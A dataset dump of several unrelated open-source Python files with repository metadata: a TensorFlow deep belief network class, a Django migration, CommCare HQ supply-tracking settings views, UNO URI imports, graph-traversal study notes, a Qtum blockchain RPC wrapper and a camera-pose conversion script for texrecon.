finetune_batch_size=20, verbose=1, momentum=0.5,):
"""Constructor.
:param rbm_layers: list containing the hidden units for each layer
:param finetune_loss_func: Loss function for the softmax layer.
string, default ['softmax_cross_entropy', 'mean_squared']
:param finetune_dropout: dropout parameter
:param finetune_learning_rate: learning rate for the finetuning.
float, default 0.001
:param finetune_act_func: activation function for the finetuning phase
:param finetune_opt: optimizer for the finetuning phase
:param finetune_num_epochs: Number of epochs for the finetuning.
int, default 20
:param finetune_batch_size: Size of each mini-batch for the finetuning.
int, default 20
:param verbose: Level of verbosity. 0 - silent, 1 - print accuracy.
int, default 0
:param do_pretrain: True: uses variables from pretraining,
False: initialize new variables.
"""
SupervisedModel.__init__(self, name)
self.momentum = momentum
self.do_pretrain = do_pretrain
self.layers = rbm_layers
self.finetune_act_func = finetune_act_func
self.verbose = verbose
# Model parameters
self.encoding_w_ = [] # list of matrices of encoding weights per layer
self.encoding_b_ = [] # list of arrays of encoding biases per layer
self.softmax_W = None
self.softmax_b = None
rbm_params = {
'num_epochs': rbm_num_epochs, 'gibbs_k': rbm_gibbs_k,
'batch_size': rbm_batch_size, 'learning_rate': rbm_learning_rate}
for p in rbm_params:
if len(rbm_params[p]) != len(rbm_layers):
# The current parameter is not specified by the user,
# should default it for all the layers
rbm_params[p] = [rbm_params[p][0] for _ in rbm_layers]
self.rbms = []
self.rbm_graphs = []
for l, layer in enumerate(rbm_layers):
rbm_str = 'rbm-' + str(l+1)
if l == 0 and rbm_gauss_visible:
self.rbms.append(
rbm.RBM(
name=self.name + '-' + rbm_str,
num_hidden=layer,
learning_rate=rbm_params['learning_rate'][l],
verbose=self.verbose,
num_epochs=rbm_params['num_epochs'][l],
batch_size=rbm_params['batch_size'][l],
gibbs_sampling_steps=rbm_params['gibbs_k'][l],
visible_unit_type='gauss', stddev=rbm_stddev))
else:
self.rbms.append(
rbm.RBM(
name=self.name + '-' + rbm_str,
num_hidden=layer,
learning_rate=rbm_params['learning_rate'][l],
verbose=self.verbose,
num_epochs=rbm_params['num_epochs'][l],
batch_size=rbm_params['batch_size'][l],
gibbs_sampling_steps=rbm_params['gibbs_k'][l]))
self.rbm_graphs.append(tf.Graph())
def pretrain(self, train_set, validation_set=None):
"""Perform Unsupervised pretraining of the DBN."""
self.do_pretrain = True
def set_params_func(rbmmachine, rbmgraph):
params = rbmmachine.get_parameters(graph=rbmgraph)
self.encoding_w_.append(params['W'])
self.encoding_b_.append(params['bh_'])
return SupervisedModel.pretrain_procedure(
self, self.rbms, self.rbm_graphs, set_params_func=set_params_func,
train_set=train_set, validation_set=validation_set)
def _train_model(self, train_set, train_labels,
validation_set, validation_labels):
"""Train the model.
:param train_set: training set
:param train_labels: training labels
:param validation_set: validation set
:param validation_labels: validation labels
:return: self
"""
shuff = zip(train_set, train_labels)
for i in range(self.num_epochs):
np.random.shuffle(shuff)
batches = [_ for _ in utilities.gen_batches(
shuff, self.batch_size)]
for batch in batches:
x_batch, y_batch = zip(*batch)
self.tf_session.run(
self.train_step, feed_dict={
self.input_data: x_batch,
self.input_labels: y_batch,
self.keep_prob: self.dropout})
if validation_set is not None:
feed = {self.input_data: validation_set,
self.input_labels: validation_labels,
self.keep_prob: 1}
self._run_validation_error_and_summaries(i, feed)
def build_model(self, n_features, n_classes):
"""Create the computational graph.
This graph is intented to be created for finetuning,
i.e. after unsupervised pretraining.
:param n_features: Number of features.
:param n_classes: number of classes.
:return: self
"""
self._create_placeholders(n_features, n_classes)
self._create_variables(n_features)
next_train = self._create_encoding_layers()
last_out = self._create_last_layer(next_train, n_classes)
self._create_cost_function_node(last_out, self.input_labels)
self.train_step = Trainer(self.opt, learning_rate=self.learning_rate,
momentum=self.momentum).compile(self.cost)
self._create_accuracy_test_node()
def _create_placeholders(self, n_features, n_classes):
"""Create the TensorFlow placeholders for the model.
:param n_features: number of features of the first layer
:param n_classes: number of classes
:return: self
"""
self.input_data = tf.placeholder(
tf.float32, [None, n_features], name='x-input')
self.input_labels = tf.placeholder(
tf.float32, [None, n_classes], name='y-input')
self.keep_prob = tf.placeholder(tf.float32, name='keep-probs')
def _create_variables(self, n_features):
"""Create the TensorFlow variables for the model.
:param n_features: number of features
:return: self
"""
if self.do_pretrain:
self._create_variables_pretrain()
else:
self._create_variables_no_pretrain(n_features)
def _create_variables_no_pretrain(self, n_features):
"""Create model variables (no previous unsupervised pretraining).
:param n_features: number of features
:return: self
"""
self.encoding_w_ = []
self.encoding_b_ = []
for l, layer in enumerate(self.layers):
if l == 0:
self.encoding_w_.append(tf.Variable(tf.truncated_normal(
shape=[n_features, self.layers[l]], stddev=0.1)))
self.encoding_b_.append(tf.Variable(tf.constant(
0.1, shape=[self.layers[l]])))
else:
self.encoding_w_.append(tf.Variable(tf.truncated_normal(
shape=[self.layers[l-1], self.layers[l]], stddev=0.1)))
self.encoding_b_.append(tf.Variable(tf.constant(
0.1, shape=[self.layers[l]])))
def _create_variables_pretrain(self):
"""Create model variables (previous unsupervised pretraining).
:return: self
"""
for l, layer in enumerate(self.layers):
self.encoding_w_[l] = tf.Variable(
self.encoding_w_[l], name='enc-w-{}'.format(l))
self.encoding_b_[l] = tf.Variable(
self.encoding_b_[l], name='enc-b-{}'.format(l))
def _create_encoding_layers(self):
"""Create the encoding layers for supervised finetuning.
:return: output of the final encoding layer.
"""
next_train = self.input_data
self.layer_nodes = []
for l, layer in enumerate(self.layers):
with tf.name_scope("encode-{}".format(l)):
y_act = tf.add(
tf.matmul(next_train, self.encoding_w_[l]),
self.encoding_b_[l]
)
if self.finetune_act_func:
layer_y = self.finetune_act_func(y_act)
else:
layer_y = None
# the input to the next layer is the output of this layer
next_train = tf.nn.dropout(layer_y, self.keep_prob)
self.layer_nodes.append(next_train)
return next_train
| 37.796154 | 79 | 0.599878 |
5b213703e459353de060af515445d270e2c4de15 | 613 | py | Python | apps/characters/migrations/0011_auto_20210805_1121.py | lucasjaroszewski/incremental-game | bae8823f986be0fd046bd50195d43fbc548fad90 | [
"MIT"
] | null | null | null | apps/characters/migrations/0011_auto_20210805_1121.py | lucasjaroszewski/incremental-game | bae8823f986be0fd046bd50195d43fbc548fad90 | [
"MIT"
] | 5 | 2021-06-09T17:54:51.000Z | 2022-03-12T00:46:49.000Z | apps/characters/migrations/0011_auto_20210805_1121.py | lucasjaroszewski/incremental-game | bae8823f986be0fd046bd50195d43fbc548fad90 | [
"MIT"
] | 1 | 2020-09-27T18:26:15.000Z | 2020-09-27T18:26:15.000Z | # Generated by Django 3.1.2 on 2021-08-05 14:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('characters', '0010_character_dungeon'),
]
operations = [
migrations.AddField(
model_name='character',
name='icon',
field=models.CharField(default='', help_text='Icon URL', max_length=255),
),
migrations.AlterField(
model_name='character',
name='image',
field=models.CharField(default='', help_text='Image URL', max_length=255),
),
]
| 25.541667 | 86 | 0.588907 |
6ef1794adad2e16f95309d0afebcfaf150bd46be | 15,459 | py | Python | corehq/apps/commtrack/views.py | dborowiecki/commcare-hq | f2f4fa67faec09040a98502f5657444075b63f2e | [
"BSD-3-Clause"
] | null | null | null | corehq/apps/commtrack/views.py | dborowiecki/commcare-hq | f2f4fa67faec09040a98502f5657444075b63f2e | [
"BSD-3-Clause"
] | null | null | null | corehq/apps/commtrack/views.py | dborowiecki/commcare-hq | f2f4fa67faec09040a98502f5657444075b63f2e | [
"BSD-3-Clause"
] | null | null | null | import copy
import json
from django.contrib import messages
from django.http import Http404, HttpResponseBadRequest, HttpResponseRedirect
from django.urls import reverse
from django.utils.decorators import method_decorator
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_noop
from memoized import memoized
from casexml.apps.stock.models import StockTransaction
from corehq import toggles
from corehq.apps.commtrack.const import SUPPLY_POINT_CASE_TYPE
from corehq.apps.commtrack.processing import (
plan_rebuild_stock_state,
rebuild_stock_state,
)
from corehq.apps.domain.decorators import domain_admin_required
from corehq.apps.domain.views.base import BaseDomainView
from corehq.apps.hqwebapp.decorators import use_jquery_ui
from corehq.apps.hqwebapp.doc_info import get_doc_info_by_id
from corehq.apps.locations.models import LocationType, SQLLocation
from corehq.form_processor.exceptions import XFormNotFound
from corehq.form_processor.interfaces.dbaccessors import FormAccessors
from corehq.util.timezones.conversions import ServerTime
from .forms import CommTrackSettingsForm, ConsumptionForm, StockLevelsForm
from .models import CommtrackActionConfig, StockRestoreConfig
from .tasks import recalculate_domain_consumption_task
from .util import all_sms_codes
@domain_admin_required
def default(request, domain):
if not (request.project and request.project.commtrack_enabled):
raise Http404()
return HttpResponseRedirect(default_commtrack_url(domain))
def default_commtrack_url(domain):
from corehq.apps.products.views import ProductListView
return reverse(ProductListView.urlname, args=[domain])
class BaseCommTrackManageView(BaseDomainView):
section_name = ugettext_noop("Setup")
@property
def section_url(self):
return reverse('default_commtrack_setup', args=[self.domain])
def get(self, *args, **kwargs):
if self.domain_object.commtrack_settings is None:
raise Http404()
return super(BaseCommTrackManageView, self).get(*args, **kwargs)
@method_decorator(domain_admin_required) # TODO: will probably want less restrictive permission?
def dispatch(self, request, *args, **kwargs):
return super(BaseCommTrackManageView, self).dispatch(request, *args, **kwargs)
class CommTrackSettingsView(BaseCommTrackManageView):
urlname = 'commtrack_settings'
page_title = ugettext_noop("Advanced Settings")
template_name = 'domain/admin/commtrack_settings.html'
@property
@memoized
def commtrack_settings(self):
return self.domain_object.commtrack_settings
@property
def page_context(self):
return {
'form': self.commtrack_settings_form
}
@property
@memoized
def commtrack_settings_form(self):
initial = self.commtrack_settings.to_json()
initial.update(dict(('consumption_' + k, v) for k, v in
self.commtrack_settings.consumption_config.to_json().items()))
initial.update(dict(('stock_' + k, v) for k, v in
self.commtrack_settings.stock_levels_config.to_json().items()))
if self.request.method == 'POST':
return CommTrackSettingsForm(self.request.POST, initial=initial, domain=self.domain)
return CommTrackSettingsForm(initial=initial, domain=self.domain)
def set_ota_restore_config(self):
"""
If the checkbox for syncing consumption fixtures is
checked, then we build the restore config with appropriate
special properties, otherwise just clear the object.
If there becomes a way to tweak these on the UI, this should
be done differently.
"""
if self.commtrack_settings.sync_consumption_fixtures:
self.domain_object.commtrack_settings.ota_restore_config = StockRestoreConfig(
section_to_consumption_types={
'stock': 'consumption'
},
force_consumption_case_types=[
SUPPLY_POINT_CASE_TYPE
],
use_dynamic_product_list=True,
)
else:
self.domain_object.commtrack_settings.ota_restore_config = StockRestoreConfig()
def post(self, request, *args, **kwargs):
if self.commtrack_settings_form.is_valid():
data = self.commtrack_settings_form.cleaned_data
previous_config = copy.copy(self.commtrack_settings)
self.commtrack_settings.use_auto_consumption = bool(data.get('use_auto_consumption'))
self.commtrack_settings.sync_consumption_fixtures = bool(data.get('sync_consumption_fixtures'))
self.commtrack_settings.individual_consumption_defaults = bool(data.get('individual_consumption_defaults'))
self.set_ota_restore_config()
fields = ('emergency_level', 'understock_threshold', 'overstock_threshold')
for field in fields:
if data.get('stock_' + field):
setattr(self.commtrack_settings.stock_levels_config, field,
data['stock_' + field])
consumption_fields = ('min_transactions', 'min_window', 'optimal_window')
for field in consumption_fields:
if data.get('consumption_' + field):
setattr(self.commtrack_settings.consumption_config, field,
data['consumption_' + field])
self.commtrack_settings.save()
for loc_type in LocationType.objects.filter(domain=self.domain).all():
# This will update stock levels based on commtrack config
loc_type.save()
if (previous_config.use_auto_consumption != self.commtrack_settings.use_auto_consumption
or previous_config.consumption_config.to_json() != self.commtrack_settings.consumption_config.to_json()
):
# kick off delayed consumption rebuild
recalculate_domain_consumption_task.delay(self.domain)
messages.success(request, _("Settings updated! Your updated consumption settings may take a "
"few minutes to show up in reports and on phones."))
else:
messages.success(request, _("Settings updated!"))
return HttpResponseRedirect(self.page_url)
return self.get(request, *args, **kwargs)
class DefaultConsumptionView(BaseCommTrackManageView):
urlname = 'update_default_consumption'
template_name = 'commtrack/manage/default_consumption.html'
page_title = ugettext_noop("Consumption")
@property
@memoized
def consumption_form(self):
if self.request.method == 'POST':
return ConsumptionForm(self.domain, self.request.POST)
return ConsumptionForm(self.domain)
@property
def page_context(self):
return {
'form': self.consumption_form,
}
def post(self, request, *args, **kwargs):
if self.consumption_form.is_valid():
self.consumption_form.save()
messages.success(request, _("Default consumption values updated"))
return HttpResponseRedirect(
reverse(DefaultConsumptionView.urlname, args=[self.domain])
)
return self.get(request, *args, **kwargs)
class SMSSettingsView(BaseCommTrackManageView):
urlname = 'commtrack_sms_settings'
page_title = ugettext_noop("SMS")
template_name = 'domain/admin/sms_settings.html'
@property
def page_context(self):
return {
'other_sms_codes': dict(self.get_other_sms_codes()),
'settings': self.settings_context,
}
@property
def settings_context(self):
return {
'actions': [self._get_action_info(a) for a in self.domain_object.commtrack_settings.actions],
}
# FIXME
def _get_action_info(self, action):
return {
'type': action.action,
'keyword': action.keyword,
'name': action.subaction,
'caption': action.caption,
}
def get_other_sms_codes(self):
for k, v in all_sms_codes(self.domain).items():
if v[0] == 'product':
yield (k, (v[0], v[1].name))
def post(self, request, *args, **kwargs):
payload = json.loads(request.POST.get('json'))
def mk_action(action):
return CommtrackActionConfig(**{
'action': action['type'],
'subaction': action['caption'],
'keyword': action['keyword'],
'caption': action['caption'],
})
# TODO add server-side input validation here (currently validated on client)
self.domain_object.commtrack_settings.actions = [mk_action(a) for a in payload['actions']]
self.domain_object.commtrack_settings.save()
return self.get(request, *args, **kwargs)
@use_jquery_ui
def dispatch(self, request, *args, **kwargs):
return super(SMSSettingsView, self).dispatch(request, *args, **kwargs)
class StockLevelsView(BaseCommTrackManageView):
urlname = 'stock_levels'
page_title = ugettext_noop("Stock Levels")
template_name = 'commtrack/manage/stock_levels.html'
@method_decorator(toggles.LOCATION_TYPE_STOCK_RATES.required_decorator())
def dispatch(self, *args, **kwargs):
return super(StockLevelsView, self).dispatch(*args, **kwargs)
def get_existing_stock_levels(self):
loc_types = LocationType.objects.by_domain(self.domain)
return [{
'loc_type': loc_type.name,
'emergency_level': loc_type.emergency_level,
'understock_threshold': loc_type.understock_threshold,
'overstock_threshold': loc_type.overstock_threshold,
} for loc_type in loc_types]
def save_stock_levels(self, levels):
"""
Accepts a list of dicts of the form returned by
get_existing_stock_levels and writes to the appropriate LocationType
"""
levels = {level['loc_type']: level for level in levels}
for loc_type in LocationType.objects.filter(domain=self.domain).all():
if loc_type.name not in levels:
continue
stock_levels = levels[loc_type.name]
changed = False
for threshold in [
'emergency_level',
'understock_threshold',
'overstock_threshold'
]:
if getattr(loc_type, threshold) != stock_levels[threshold]:
setattr(loc_type, threshold, stock_levels[threshold])
changed = True
if changed:
loc_type.save()
@property
def page_context(self):
return {
'stock_levels_form': self.stock_levels_form
}
@property
@memoized
def stock_levels_form(self):
if self.request.method == "POST":
data = self.request.POST
else:
data = self.get_existing_stock_levels()
return StockLevelsForm(data, request=self.request)
def post(self, request, *args, **kwargs):
if self.stock_levels_form.is_valid():
self.save_stock_levels(self.stock_levels_form.cleaned_data)
return HttpResponseRedirect(self.page_url)
# TODO display error messages to the user...
return self.get(request, *args, **kwargs)
class RebuildStockStateView(BaseCommTrackManageView):
urlname = 'rebuild_stock_state'
page_title = ugettext_noop("Rebuild Stock State")
template_name = 'commtrack/manage/rebuild_stock_state.html'
@memoized
def get_server_date_by_form_id(self, form_id):
try:
server_date = FormAccessors(self.domain).get_form(form_id).received_on
except XFormNotFound:
return None
else:
return ServerTime(server_date).ui_string()
def _get_selected_case_id(self):
location_id = self.request.GET.get('location_id')
if location_id:
try:
return (SQLLocation.objects
.get(domain=self.domain, location_id=location_id)
.supply_point_id)
except SQLLocation.DoesNotExist:
messages.error(self.request, 'Your location id did not match a location')
@property
def page_context(self, **kwargs):
stock_state_limit = int(self.request.GET.get('stock_state_limit', 100))
stock_transaction_limit = int(self.request.GET.get('stock_transaction_limit', 1000))
stock_state_limit_exceeded = False
stock_transaction_limit_exceeded = False
query = StockTransaction.objects.filter(report__domain=self.domain)
selected_case_id = self._get_selected_case_id()
if selected_case_id:
query = query.filter(case_id=selected_case_id)
selected_product_id = self.request.GET.get('product_id')
if selected_product_id:
query = query.filter(product_id=selected_product_id)
stock_state_keys = [
(txn.case_id, txn.section_id, txn.product_id)
for txn in query
.order_by('case_id', 'section_id', 'product_id')
.distinct('case_id', 'section_id', 'product_id')
[:stock_state_limit]
]
if len(stock_state_keys) >= stock_state_limit:
stock_state_limit_exceeded = True
actions_by_stock_state_key = []
stock_transaction_count = 0
for stock_state_key in stock_state_keys:
actions = self.get_actions_by_stock_state_key(*stock_state_key)
stock_transaction_count += len(actions[1])
if stock_transaction_count > stock_transaction_limit:
stock_transaction_limit_exceeded = True
break
actions_by_stock_state_key.append(actions)
assert len(set(stock_state_keys)) == len(stock_state_keys)
return {
'actions_by_stock_state_key': actions_by_stock_state_key,
'stock_state_limit_exceeded': stock_state_limit_exceeded,
'stock_state_limit': stock_state_limit,
'stock_transaction_limit_exceeded': stock_transaction_limit_exceeded,
'stock_transaction_limit': stock_transaction_limit,
}
def get_actions_by_stock_state_key(self, case_id, section_id, product_id):
actions = [
(
action.__class__.__name__,
action,
self.get_server_date_by_form_id(
action.stock_transaction.report.form_id),
) for action in
plan_rebuild_stock_state(case_id, section_id, product_id)
]
return (
{'case_id': case_id,
'section_id': section_id,
'product_id': product_id},
actions,
get_doc_info_by_id(self.domain, case_id)
)
def post(self, request, *args, **kwargs):
case_id = request.POST.get('case_id')
section_id = request.POST.get('section_id')
product_id = request.POST.get('product_id')
if None in (case_id, section_id, product_id):
return HttpResponseBadRequest()
rebuild_stock_state(case_id, section_id, product_id)
return HttpResponseRedirect('.')
| 38.744361 | 119 | 0.658322 |
0fed691331ec28b7b1c0a4f324a6a7d490515ab6 | 2,331 | py | Python | ooobuild/cssdyn/uri/__init__.py | Amourspirit/ooo_uno_tmpl | 64e0c86fd68f24794acc22d63d8d32ae05dd12b8 | [
"Apache-2.0"
] | null | null | null | ooobuild/cssdyn/uri/__init__.py | Amourspirit/ooo_uno_tmpl | 64e0c86fd68f24794acc22d63d8d32ae05dd12b8 | [
"Apache-2.0"
] | null | null | null | ooobuild/cssdyn/uri/__init__.py | Amourspirit/ooo_uno_tmpl | 64e0c86fd68f24794acc22d63d8d32ae05dd12b8 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
#
# Copyright 2022 :Barry-Thomas-Paul: Moss
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from ...dyn.uri.external_uri_reference_translator import ExternalUriReferenceTranslator as ExternalUriReferenceTranslator
from ...dyn.uri.relative_uri_excess_parent_segments import RelativeUriExcessParentSegments as RelativeUriExcessParentSegments
from ...dyn.uri.uri_reference_factory import UriReferenceFactory as UriReferenceFactory
from ...dyn.uri.uri_scheme_parser_vnd_do_tsun_do_tstar_do_texpand import UriSchemeParser_vndDOTsunDOTstarDOTexpand as UriSchemeParser_vndDOTsunDOTstarDOTexpand
from ...dyn.uri.uri_scheme_parser_vnd_do_tsun_do_tstar_do_tscript import UriSchemeParser_vndDOTsunDOTstarDOTscript as UriSchemeParser_vndDOTsunDOTstarDOTscript
from ...dyn.uri.vnd_sun_star_pkg_url_reference_factory import VndSunStarPkgUrlReferenceFactory as VndSunStarPkgUrlReferenceFactory
from ...dyn.uri.x_external_uri_reference_translator import XExternalUriReferenceTranslator as XExternalUriReferenceTranslator
from ...dyn.uri.x_uri_reference import XUriReference as XUriReference
from ...dyn.uri.x_uri_reference_factory import XUriReferenceFactory as XUriReferenceFactory
from ...dyn.uri.x_uri_scheme_parser import XUriSchemeParser as XUriSchemeParser
from ...dyn.uri.x_vnd_sun_star_expand_url import XVndSunStarExpandUrl as XVndSunStarExpandUrl
from ...dyn.uri.x_vnd_sun_star_expand_url_reference import XVndSunStarExpandUrlReference as XVndSunStarExpandUrlReference
from ...dyn.uri.x_vnd_sun_star_pkg_url_reference_factory import XVndSunStarPkgUrlReferenceFactory as XVndSunStarPkgUrlReferenceFactory
from ...dyn.uri.x_vnd_sun_star_script_url import XVndSunStarScriptUrl as XVndSunStarScriptUrl
from ...dyn.uri.x_vnd_sun_star_script_url_reference import XVndSunStarScriptUrlReference as XVndSunStarScriptUrlReference
| 72.84375 | 159 | 0.864436 |
3cfb0239d1bcb7d0709aeb8f5511cdb95f205d48 | 1,298 | py | Python | Notes/Sprint3/graphs2.py | mark-morelos/CS_Notes | 339c47ae5d7e678b7ac98d6d78857d016c611e38 | [
"MIT"
] | 1 | 2021-02-28T07:43:59.000Z | 2021-02-28T07:43:59.000Z | Notes/Sprint3/graphs2.py | mark-morelos/CS_Notes | 339c47ae5d7e678b7ac98d6d78857d016c611e38 | [
"MIT"
] | null | null | null | Notes/Sprint3/graphs2.py | mark-morelos/CS_Notes | 339c47ae5d7e678b7ac98d6d78857d016c611e38 | [
"MIT"
] | 1 | 2021-03-03T03:52:21.000Z | 2021-03-03T03:52:21.000Z | # Adjacency Matrix
grah_matrix = [
[0,1,0,0,0],
[1,0,1,1,1],
[0,1,0,1,0],
[0,1,1,0,0],
[0,1,0,0,0]
]
# What are my neigbors for A?
# graph_matrix[0] # <- All the neighbors for A
# # Is B and C connected?
# graph_matrix[1][2] == 1 # return true
# # Add connection from A to C
# graph_matrix[0][2] = 1 # we have now made a connection from A to C
# Adjacency List
graph_list = {
'A': {'B'},
'B': {'C', 'D', 'E'},
'C': {'D'},
'D': {},
'E': {}
}
# # What are my neighbors for A?
# graph_list['A'] # <- the set of all neighbors for A
# # Is C and B connected?
# 'C' in graph_list['B'] # ? this will return true
# # Add connection from A to C
# graph_list['A'].add['C']
# Add a new vertex and connect A and C to it
graph_list['F'] = {'C'}
graph_list['A'].add('F')
def print_paths(graph, start_vertex, current_path=[]):
current_path.append(start_vertex)
# if no neighbors, print the path
if len(graph[start_vertex]) == 0:
print(current_path)
# For each neighbor, call print_paths, with the current_path containing our current_vertex
for neighbor in graph[start_vertex]:
# make a copy of the path
new_path = current_path.copy()
print_paths(graph, neighbor, new_path)
print_paths(graph_list, "A", []) | 22.37931 | 94 | 0.605547 |
fe4089fba1ead6c598bc32577e8b43f0d06dffac | 1,838 | py | Python | pdms/qtum_bridge/R8Blockchain/qtumblockchain.py | chris0203/pmes | 97df332b859803e9953f983dda3ca47d4bc35758 | [
"Apache-2.0"
] | null | null | null | pdms/qtum_bridge/R8Blockchain/qtumblockchain.py | chris0203/pmes | 97df332b859803e9953f983dda3ca47d4bc35758 | [
"Apache-2.0"
] | null | null | null | pdms/qtum_bridge/R8Blockchain/qtumblockchain.py | chris0203/pmes | 97df332b859803e9953f983dda3ca47d4bc35758 | [
"Apache-2.0"
] | null | null | null | from bitcoinrpc.authproxy import AuthServiceProxy
from hashlib import sha256
from R8Blockchain.blockchain_handler import BlockchainHandler
import codecs
import logging
class QtumBlockchain(BlockchainHandler):
def __init__(self, qtum_rpc):
self.qtum_rpc = qtum_rpc
self.decode_hex = codecs.getdecoder("hex_codec")
self.encode_hex = codecs.getencoder("hex_codec")
@classmethod
def from_http_provider(cls, http_provider):
return cls(AuthServiceProxy(http_provider))
def get_block_count(self):
return self.qtum_rpc.getblockcount()
def get_balance(self):
return self.qtum_rpc.getbalance()
def get_last_block_hash(self):
return self.qtum_rpc.getbestblockhash()
def get_second_last_block_hash(self):
return self.get_block_hash(self.get_block_count()-1)
def get_block_hash(self, height):
return self.qtum_rpc.getblockhash(height)
def get_block_id(self, height):
block_hash = self.get_block_hash(height)
l = sha256(self.decode_hex(block_hash)[0]).hexdigest()
r = hex(height)
return l[0:10] + r[2:].rjust(10, '0')
def get_last_block_id(self):
last_block_height = self.get_block_count()
return self.get_block_id(last_block_height)
def get_second_last_block_id(self):
last_block_height = self.get_block_count() - 1
return self.get_block_id(last_block_height)
def get_accounts(self):
unspent = self.qtum_rpc.listunspent()
res = [tx['address'] for tx in unspent]
return res
def get_unspent(self):
unspent = self.qtum_rpc.listunspent()
res = {tx['address']: tx['amount'] for tx in unspent}
return res
def from_hex_address(self, address):
return self.qtum_rpc.fromhexaddress(address)
| 27.432836 | 62 | 0.692057 |
387483e127d508384db2c3e2f97efcfaeda0cefa | 4,916 | py | Python | dense_map/geometry_mapper/tools/cameras_to_texrecon.py | CodeMasterBond/isaac | b21a533cf30eed012fe12ece047b6d87418d7c6f | [
"Apache-2.0"
] | 19 | 2021-11-18T19:29:16.000Z | 2022-02-23T01:55:51.000Z | dense_map/geometry_mapper/tools/cameras_to_texrecon.py | CodeMasterBond/isaac | b21a533cf30eed012fe12ece047b6d87418d7c6f | [
"Apache-2.0"
] | 13 | 2021-11-30T17:14:46.000Z | 2022-03-22T21:38:33.000Z | dense_map/geometry_mapper/tools/cameras_to_texrecon.py | CodeMasterBond/isaac | b21a533cf30eed012fe12ece047b6d87418d7c6f | [
"Apache-2.0"
] | 6 | 2021-12-03T02:38:21.000Z | 2022-02-23T01:52:03.000Z | # Copyright (c) 2021, United States Government, as represented by the
# Administrator of the National Aeronautics and Space Administration.
#
# All rights reserved.
#
# The "ISAAC - Integrated System for Autonomous and Adaptive Caretaking
# platform" software is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Create camera files that texrecon will understand.
import argparse
import glob
import os
import re
import sys
import numpy as np
parser = argparse.ArgumentParser(
description="Convert cameras to the format of texrecon."
)
parser.add_argument(
"--camera_dir",
default="",
help="The directory containing the camera information (the output of geometry_mapper).",
)
parser.add_argument(
"--undistorted_image_dir",
default="",
help="The directory containing the undistorted images.",
)
parser.add_argument(
"--camera_type",
default="",
help="The camera type (nav_cam, haz_cam, or sci_cam, etc.).",
)
args = parser.parse_args()
if args.camera_dir == "" or args.undistorted_image_dir == "" or args.camera_type == "":
print(
"Must specify the camera directory, directory of undistorted images, and camera type."
)
sys.exit(1)
# Read the intrinsics
intr_file = args.undistorted_image_dir + "/undistorted_intrinsics.txt"
if not os.path.exists(intr_file):
print("Missing file: " + intr_file)
sys.exit(1)
with open(intr_file, "r") as f:
for line in f:
if re.match("^\s*\#", line):
continue # ignore the comments
vals = line.split()
if len(vals) < 5:
print("Expecting 5 parameters in " + intr_file)
sys.exit(1)
widx = float(vals[0])
widy = float(vals[1])
f = float(vals[2])
cx = float(vals[3])
cy = float(vals[4])
max_wid = widx
if widy > max_wid:
max_wid = widy
# normalize
nf = f / max_wid
ncx = cx / widx
ncy = cy / widy
d0 = 0.0
d1 = 0.0
paspect = 1.0
break # finished reading the line we care for
# Convert the cameras to texrecon's format
suffix = "_" + args.camera_type + "_to_world.txt"
# Get the cameras to write based on the list of images in the index
# We avoid simply doing an ls in that directory to ensure we don't
# run into old files
index_file = os.path.join(args.camera_dir, args.camera_type + "_index.txt")
camera_files = []
with open(index_file, "r") as f:
for image_file in f:
image_file = image_file.rstrip()
image_file = os.path.basename(image_file)
m = re.match("^(.*?)\.jpg", image_file)
if not m:
print("Expecting a .jpg file, but got: " + image_file)
in_cam = os.path.join(args.camera_dir, m.group(1) + suffix)
camera_files.append(in_cam)
out_cam = args.undistorted_image_dir + "/" + os.path.basename(in_cam)
m = re.match("^(.*?)" + suffix, out_cam)
if not m:
print("Could not match desired expression.")
sys.exit(1)
out_cam = m.group(1) + ".cam"
if not os.path.exists(in_cam):
print("Cannot find: " + in_cam)
sys.exit(1)
M = np.loadtxt(in_cam) # camera to world
M = np.linalg.inv(M) # world to camera
print("Writing: " + out_cam)
with open(out_cam, "w") as g:
# translation
g.write("%0.17g %0.17g %0.17g " % (M[0][3], M[1][3], M[2][3]))
# rotation
g.write(
"%0.17g %0.17g %0.17g %0.17g %0.17g %0.17g %0.17g %0.17g %0.17g\n"
% (
M[0][0],
M[0][1],
M[0][2],
M[1][0],
M[1][1],
M[1][2],
M[2][0],
M[2][1],
M[2][2],
)
)
# normaized inrinsics
g.write(
"%0.17g %0.17g %0.17g %0.17g %0.17g %0.17g\n"
% (nf, d0, d1, paspect, ncx, ncy)
)
# Save the name of the camera transforms. This will be used later
# for individual texturing of each image and camera.
camera_list = os.path.join(args.camera_dir, args.camera_type + "_transforms.txt")
with open(camera_list, "w") as f:
print("Writing: " + camera_list)
for camera in camera_files:
f.write(camera + "\n")
| 30.725 | 94 | 0.5893 |
29d3365891f0cbf8a13be972e1ff6ed0efcdfa12 | 1,052 | py | Python | isi_sdk_7_2/test/test_compatibilities_ssd_active_active_item.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 24 | 2018-06-22T14:13:23.000Z | 2022-03-23T01:21:26.000Z | isi_sdk_7_2/test/test_compatibilities_ssd_active_active_item.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 46 | 2018-04-30T13:28:22.000Z | 2022-03-21T21:11:07.000Z | isi_sdk_7_2/test/test_compatibilities_ssd_active_active_item.py | mohitjain97/isilon_sdk_python | a371f438f542568edb8cda35e929e6b300b1177c | [
"Unlicense"
] | 29 | 2018-06-19T00:14:04.000Z | 2022-02-08T17:51:19.000Z | # coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 2
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
